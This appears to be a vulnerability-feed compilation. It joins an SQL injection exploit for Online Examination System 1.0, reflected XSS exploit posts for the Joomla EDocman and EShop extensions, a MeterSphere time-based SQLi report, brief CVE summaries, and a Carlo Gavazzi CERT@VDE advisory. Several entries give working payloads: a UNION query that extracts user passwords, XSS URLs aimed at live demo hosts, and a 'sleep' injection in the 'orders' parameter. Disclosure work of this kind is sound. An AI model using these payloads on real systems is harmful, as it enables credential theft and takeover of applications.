Online Examination System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Examination System - SQL Injection# Google Dork: N/A# Date: 2022-9-28# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :vulnerable code in file account.php<?phpif(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {$eid=@$_GET['eid'];$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );echo '<div class="panel" style="margin:5%">';while($row=mysqli_fetch_array($q) )?>1) Log in to the application after register new userinject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--

Online Examination System 1.0 SQL Injection

Joomla EDocman extension version 1.23.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Ossolution Team                                                            ││  Software : EDocman 1.23.3 Extension for Joomla - Reflected XSS                        ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'filter_search' is vulnerable to XSSPath: index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=[XSS]https://joomdonationdemo.com/edocman/index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=ekmj6"onfocus="alert(1)"autofocus="fjozn[-] Done

Joomla EDocman 1.23.3 Cross Site Scripting

A zip slip vulnerability in the file upload function of Chamilo v1.11 allows attackers to execute arbitrary code via a crafted Zip file.

CVE-2022-40407: Security issues - Chamilo LMS

An issue was discovered in Samsung TizenRT through 3.0_GBM (and 3.1_PRE). createDB in security/provisioning/src/provisioningdatabasemanager.c has a missing sqlite3_free after sqlite3_exec, leading to a denial of service.

CVE-2022-40278: TizenRT/provisioningdatabasemanager.c at f8f776dd183246ad8890422c1ee5e8f33ab2aaaf · Samsung/TizenRT

BigProf Online Invoicing System before 2.9 suffers from an unauthenticated SQL Injection found in /membership_passwordReset.php (the endpoint that is responsible for issuing self-service password resets). An unauthenticated attacker is able to send a request containing a crafted payload that can result in sensitive information being extracted from the database, eventually leading into an application takeover. This vulnerability was introduced as a result of the developer trying to roll their own sanitization implementation in order to allow the application to be used in legacy environments.

CVE-2020-35674

Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 allows attackers to discover accounts via MySQL "select * from Administrator_users" and "select * from Users_users" requests.

CVE-2020-15333

Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded APP_KEY in /opt/axess/etc/default/axess.

CVE-2020-15330: Multiple vulnerabilities found in Zyxel CNM SecuManager

Time-based SQL Injection vulnerabilities were found in Metersphere v1.15.4 via the "orders" parameter.

**Version**

v1.15.4

**Description**

Authenticated users can control the parameters in the "order by" statement, which causing SQL injection.

API: /test/case/list/{goPage}/{pageSize}

Vulnerable source code:  
ExtTestPlanTestCaseMapper.xml

        <select id="list" resultType="io.metersphere.track.dto.TestPlanCaseDTO">
            select test_plan_test_case.id as id, test_case.id as caseId, test_case.name, test_case.priority,
            test_case.type,test_case.test_id as testId,test_case.node_id, test_case.tags, test_case.maintainer,
            test_case.custom_fields,
            test_case.node_path, test_case.method, if(project.custom_num = 0, cast(test_case.num as char),
            test_case.custom_num) as customNum, test_plan_test_case.executor, test_plan_test_case.status,
            test_plan_test_case.actual_result,
            test_plan_test_case.update_time, test_plan_test_case.create_time,test_case_node.name as model, project.name as
            projectName,test_plan_test_case.issues as issues,test_plan_test_case.issues_count as issuesCount,
            test_plan_test_case.plan_id as planId
            from test_plan_test_case
            inner join test_case on test_plan_test_case.case_id = test_case.id
            left join test_case_node on test_case_node.id = test_case.node_id
            inner join project on project.id = test_case.project_id
            <include refid="queryWhereCondition"/>
            <if test="request.orders != null and request.orders.size() > 0">
                order by
                <foreach collection="request.orders" separator="," item="order">
                    <choose>
                        <when test="order.name == 'custom_num'">
                         customNum ${order.type}
                        </when>
                         <when test="order.name == 'name'">
                            test_case.name ${order.type}
                         </when>
                        <otherwise>
                            test_plan_test_case.${order.name} ${order.type}
                        </otherwise>
                    </choose>
                </foreach>
            </if>
        </select>
    

TestPlanTestCaseService.java

        public List<TestPlanCaseDTO> list(QueryTestPlanCaseRequest request) {
            request.setOrders(ServiceUtils.getDefaultSortOrder(request.getOrders()));
            List<TestPlanCaseDTO> list = extTestPlanTestCaseMapper.list(request);
            QueryMemberRequest queryMemberRequest = new QueryMemberRequest();
            queryMemberRequest.setProjectId(request.getProjectId());
            Map<String, String> userMap = userService.getProjectMemberList(queryMemberRequest)
                    .stream().collect(Collectors.toMap(User::getId, User::getName));
            list.forEach(item -> {
                item.setExecutorName(userMap.get(item.getExecutor()));
                item.setMaintainerName(userMap.get(item.getMaintainer()));
            });
            return list;
        }
    
    

**To Reproduce**

I have tested this vulnerability on the demo website https://demo.metersphere.com/.  
Set the value of the "orders" parameter

    "orders":[{"name":"name","type":",if(1=1,sleep(2),0)"}]
    

As we have seen, this lead to time-based sqli

  
  
Some other APIs also have sqli，such as

    /test/plan/case/list/all
    /test/plan/case/list/ids
    /issues/list/{goPage}/{pageSize}
    /test/case/list/{goPage}/{pageSize}

CVE-2021-45788: [BUG]Time-based SQL Injetion in v1.15.4 · Issue #8651 · metersphere/metersphere

EShop Joomla Shopping-Cart extension version 3.6.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Ossolution Team                                                            ││  Software : EShop Joomla Shopping-Cart 3.6.0 - Reflected XSS                           ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'change_filter' is vulnerable to XSSPath: /eshop/filter.html?change_filter=[XSS]https://joomdonationdemo.com/eshop/filter.html?change_filter=d1a5x"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wklcp[-] Done

EShop Joomla Shopping-Cart 3.6.0 Cross Site Scripting

In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in Version 2.8.3 the Sentilo Proxy is prone to reflected XSS which only affects the Sentilo service.

2022-09-26 10:00 (CEST) VDE-2022-029  

**Carlo Gavazzi Controls: Multiple Vulnerabilities in Controller UWP 3.0**  
Share: Email | Twitter  

**

Published

**

2022-09-26 10:00 (CEST)

**

Last update

**

2022-09-26 12:00 (CEST)

**Vendor(s)**

Carlo Gavazzi Controls SpA  

**Product(s)**

Article No°

Product Name

Affected Version(s)

SBP2CPY24

CPY Car Park Server

< 2.8.3

UWP30RSEXXX

UWP 3.0 Monitoring Gateway and Controller

< 8.5.0.3

UWP30RSEXXXEDP

UWP 3.0 Monitoring Gateway and Controller – EDP version

< 8.5.0.3

UWP30RSEXXXSE

UWP 3.0 Monitoring Gateway and Controller – Security Enhanced

< 8.5.0.3

**

Summary

**

The UWP 3.0 family of Monitoring Gateways and Controllers and the CPY Car Park Server are affected by multiple vulnerabilities in their set-up software, runtime firmware, embedded Web interface.

**

Vulnerabilities

**

**Weakness**

Use of Hard-coded Credentials (CWE-798)

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could make use of hard-coded credentials to gain full access to ..._

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions an unauthenticated remote attacker could utilize a SQL-Injection vulnerability to gain full database access, modify ..._

**Weakness**

Missing Authentication for Critical Function (CWE-306)

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a missing authentication allows for full access via API._

**Weakness**

Improper Input Validation (CWE-20)

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could utilize an improper input validation on an API-submitted parameter to ..._

**Weakness**

Use of Hard-coded Credentials (CWE-798)

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could make use of hard-coded credentials to gain SuperUser access to ..._

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions was discovered to be vulnerable to a relative path traversal vulnerability which enables remote attackers ..._

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions the Sentilo Proxy is prone to reflected XSS which only affects the Sentilo service._

**Summary**

_An improper authentication vulnerability exists in the Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions Web-App which allows an authentication bypass to the context of ..._

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could make use of an SQL-injection to gain access to a ..._

**Weakness**

Improper Input Validation (CWE-20)

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions an remote attacker with admin rights could execute arbitrary commands due to missing input sanitization ..._

**Summary**

_In Carlo Gavazzi UWP3.0 in multiple versions the Sentilo Proxy server was discovered to contain a SQL injection vulnerability allowing an attacker to query other tables of the Sentilo service._

**

Impact

**

An attacker can get full access to the affected devices. See the vulnerability descriptions for details.

**

Solution

**

**General recommendations**

*   Use controllers and devices only in a protected environment to minimize network exposure and ensure that they are not accessible from outside
*   Use firewalls to protect and separate the control system network from other networks
*   Use VPN (Virtual Private Networks) tunnels if remote access is required
*   Activate and apply user management and password features
*   Use encrypted communication links
*   Limit the access to both set-up and control system by physical means, operating system features, etc.
*   Protect the set-up and control system by using up to date virus detecting solutions

**Remediation**

Please update to software/firmware versions as described below:

**Article Nr.**

**Product Name and Description**

**Fixed in version**

UWP30RSEXXX

UWP 3.0 Monitoring Gateway and Controller

\>= 8.5.0.3  
available from April 27th,2022

UWP30RSEXXXSE

UWP 3.0 Monitoring Gateway and Controller – Security  
Enhanced

UWP30RSEXXXEDP

UWP 3.0 Monitoring Gateway and Controller – EDP version

SBP2CPY24

CPY Car Park Server

\>= 2.8.3  
available from June 28th,2022

**

Reported by

**

Carlo Gavazzi thanks the following parties for their efforts:

*   CERT@VDE for coordination and support with this publication
*   Vera Mens from Claroty Research for reporting to CERT@VDE

Tag

#sql